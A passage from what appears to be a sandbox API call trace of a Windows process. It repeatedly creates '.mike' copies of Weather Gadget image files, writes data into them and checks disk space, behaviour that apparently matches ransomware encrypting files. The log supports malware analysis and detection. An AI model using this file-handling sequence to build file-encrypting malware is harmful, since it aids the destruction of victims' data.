lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.868] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.869] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.870] WriteFile (in: hFile=0x284, lpBuffer=0x217db28*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217db28*, lpNumberOfBytesWritten=0x2af074*=0x6b0, lpOverlapped=0x0) returned 1 [0134.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.871] WriteFile (in: hFile=0x284, lpBuffer=0x2180d88*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2180d88*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.872] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.873] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.873] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", dwFileAttributes=0x80) returned 0 [0134.874] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png", lpFilePart=0x0) returned 0x59 [0134.875] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.875] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_snow.png.mike", lpFilePart=0x0) returned 0x5e [0134.876] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", lpFilePart=0x0) returned 0x58 [0134.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.879] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.880] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.881] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", lpFilePart=0x0) returned 0x58 [0134.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.882] WriteFile (in: hFile=0x284, lpBuffer=0x2186404*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2186404*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.884] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.897] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.898] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.898] WriteFile (in: hFile=0x284, lpBuffer=0x21991ec*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21991ec*, lpNumberOfBytesWritten=0x2af074*=0x4f0, lpOverlapped=0x0) returned 1 [0134.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.900] WriteFile (in: hFile=0x284, lpBuffer=0x219c448*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x219c448*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.901] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.901] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.902] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", dwFileAttributes=0x80) returned 0 [0134.903] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png", lpFilePart=0x0) returned 0x58 [0134.903] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.904] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png.mike", lpFilePart=0x0) returned 0x5d [0134.905] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", lpFilePart=0x0) returned 0x5a [0134.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.908] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.909] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", lpFilePart=0x0) returned 0x5a [0134.909] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.910] WriteFile (in: hFile=0x284, lpBuffer=0x21a1b1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21a1b1c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.912] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.917] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.919] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.919] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.920] WriteFile (in: hFile=0x284, lpBuffer=0x21b6c64*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21b6c64*, lpNumberOfBytesWritten=0x2af074*=0xad0, lpOverlapped=0x0) returned 1 [0134.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.922] WriteFile (in: hFile=0x284, lpBuffer=0x21b9ec8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21b9ec8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.922] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.923] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.924] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", dwFileAttributes=0x80) returned 0 [0134.925] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png", lpFilePart=0x0) returned 0x5a [0134.925] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.926] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png.mike", lpFilePart=0x0) returned 0x5f [0134.927] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", lpFilePart=0x0) returned 0x5b [0134.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.930] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", lpFilePart=0x0) returned 0x5b [0134.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.931] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png", lpFilePart=0x0) returned 0x5b [0134.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.932] WriteFile (in: hFile=0x284, lpBuffer=0x21bf618*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21bf618*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.934] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.937] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.938] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.939] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png.mike", lpFilePart=0x0) returned 0x60 [0134.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.939] WriteFile (in: hFile=0x284, lpBuffer=0x21d0db0*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d0db0*, lpNumberOfBytesWritten=0x2af074*=0x130, lpOverlapped=0x0) returned 1 [0134.940] SetThreadErrorMode (dwNewMode=0x1, 